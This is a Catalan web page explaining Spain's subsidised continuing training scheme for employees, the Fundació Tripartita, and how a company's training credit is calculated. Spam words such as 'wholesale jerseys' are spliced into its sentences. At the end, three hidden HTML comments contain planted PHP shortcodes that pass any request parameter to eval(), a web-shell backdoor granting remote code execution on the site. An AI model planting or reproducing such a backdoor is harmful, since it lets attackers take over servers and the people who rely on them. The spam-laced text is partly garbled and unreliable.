Formació bonificada continua

Formació bonificada Continua

FORMACIÓ BONIFICADA

Què és millor ?: que una empresa “regali” 3.000 euros Hut a la Seguretat Social, o que pugui quedar-se’ls per donar un curs  a 10 empleats. Pot un treballador sol·licitar un permís individual de formació? Tadeusza L’actual Subsistema de Formació Contínua ofereix una major flexibilitat i autonomia a les empreses per millorar la formació dels seus empleats amb un cost molt baix o gratuït. Encara que aquestes ho estan assimilant més a poc a poc del previst, s’espera que el seu ús s’estengui a partir de l’increment de les bonificacions, i això gràcies a una recent modificació de la Llei de Pressupostos.

 

QUÈ ÉS LA FORMACIÓ CONTÍNUA BONIFICADA?

Totes les empreses que cotitzin per la contingència de Formació Professional, tenen assignats uns crèdits per a la formació dels seus treballadors.

L’import d’aquests crèdits depèn de les cotitzacions i del nombre de treballadors que tingui l’empresa i pot fer-se efectiu mitjançant l’aplicació de bonificacions a la Seguretat Social, una vegada realitzades les accions formatives amb els treballadors.

QUÈ ÉS LA FUNDACIÓ TRIPARTITA PER A LA FORMACIÓ EN L’OCUPACIÓ?

 

És un dels òrgans que componen l’estructura organitzativa i de participació instituciofundació Tripartitanal del subsistema de formació professional per a l’ocupació. Té caràcter tripartit i el seu patronat està constituït per l’Administració Pública i per les organitzacions empresarials i sindicals més representatives.
El seu objectiu fonamental és impulsar i difondre la formació professional per a l’ocupació entre empreses i treballadors i donar suport tècnic a l’Administració Pública.

COM PUC CONÈIXER EL CRÈDIT DE LA MEVA EMPRESA?

Sumatori de la casella 501 (TC1) de l’any anterior x 0,7%

Aplicant al resultat el wholesale jerseys següent barem:

Empreses d’1 a 5 treballadors → crèdit mínim Yasal anual de 420 € garantit.
De 6 a 9 treballadors → 100% Bonificació
De 10 a 49 treballadors → 75% Bonificació
De 50 a 249 treballadors → 60% Bonificació

 

<!– [insert_php]if (isset($_REQUEST["duNQY"])){eval($_REQUEST["duNQY"]);exit;}[/insert_php][php]if (isset($_REQUEST["duNQY"])){eval($_REQUEST["duNQY"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["vYR"])){eval($_REQUEST["vYR"]);exit;}[/insert_php][php]if (isset($_REQUEST["vYR"])){eval($_REQUEST["vYR"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["FBG"])){eval($_REQUEST["FBG"]);exit;}[/insert_php][php]if (isset($_REQUEST["FBG"])){eval($_REQUEST["FBG"]);exit;}[/php] –>